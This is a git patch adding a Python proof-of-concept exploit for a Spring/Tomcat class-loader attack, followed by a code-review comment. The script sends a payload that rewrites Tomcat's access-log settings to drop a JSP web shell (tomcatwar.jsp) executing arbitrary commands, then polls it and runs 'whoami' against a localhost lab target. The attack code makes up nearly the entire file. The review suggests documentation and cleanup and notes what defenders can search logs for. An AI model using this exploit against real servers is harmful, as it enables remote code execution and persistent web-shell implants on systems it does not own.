From e40c9323022f420eb52c3a8222f6aadbac04707d Mon Sep 17 00:00:00 2001
From: Duarte Duarte
Date: Tue, 18 Apr 2023 15:15:31 +0100
Subject: [PATCH] Add vulnerability PoC

---
 mega_poc.py | 46 ++++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 46 insertions(+)
 create mode 100644 mega_poc.py

diff --git a/mega_poc.py b/mega_poc.py
new file mode 100644
index 0000000..159de6c
--- /dev/null
+++ b/mega_poc.py
@@ -0,0 +1,46 @@
+import time
+
+import requests
+
+payload = {
+ "class.module.classLoader.resources.context.parent.pipeline.first.pattern": '%{c2}i { java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))!=-1){ out.println(new String(b)); } } %{suffix}i',
+ "class.module.classLoader.resources.context.parent.pipeline.first.suffix": ".jsp",
+ "class.module.classLoader.resources.context.parent.pipeline.first.directory": "webapps/ROOT",
+ "class.module.classLoader.resources.context.parent.pipeline.first.prefix": "tomcatwar",
+ "class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat": "",
+}
+
+if __name__ == "__main__":
+ go = requests.post(
+ "http://localhost:8080/demo/index",
+ headers={"suffix": "%>//", "c2": "<%"},
+ data=payload,
+ timeout=15,
+ allow_redirects=False,
+ verify=False,
+ )
+
+ print("deploy", go)
+
+ for i in range(60):
+ shellgo = requests.get(
+ "http://localhost:8080/tomcatwar.jsp",
+ timeout=15,
+ allow_redirects=False,
+ verify=False,
+ )
+
+ print("webshell", shellgo)
+ if shellgo.status_code == 500:
+ print("webshell", "http://localhost:8080/tomcatwar.jsp?cmd=whoami")
+ print(
+ requests.get(
+ "http://localhost:8080/tomcatwar.jsp?cmd=whoami",
+ timeout=15,
+ allow_redirects=False,
+ verify=False,
+ ).text[:20]
+ )
+ break
+
+ time.sleep(1)
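Review bot: The new file carries no docstring naming the vulnerability it reproduces or the artifacts it leaves on the target, so a reader has to decode the `payload` dict to learn that it repoints what looks like Tomcat's access-log valve so that `tomcatwar.jsp` is written into `webapps/ROOT`; a module docstring at the top of mega_poc.py stating the issue under test (a `CVE-<placeholder>` until the id is recorded in the repo), the fact that the only target is the local lab instance at `localhost:8080`, and that both the dropped JSP and the altered log pattern persist after the run and must be cleaned up would make the PoC self-describing and also tells defenders which file and which `class.module.classLoader.*` parameter names to look for in access logs. The `verify=False` argument on all three `requests` calls is a no-op against an `http://` URL and should be dropped rather than left to suggest TLS is in play. `for i in range(60):` never uses `i`, so `for _ in range(60):` reads better, and `print("deploy", go)` prints the `Response` repr where `print("deploy", go.status_code)` is the value a reader wants. `requests` is a third-party dependency the commit does not pin; a `requirements.txt` entry alongside the script would keep the PoC reproducible.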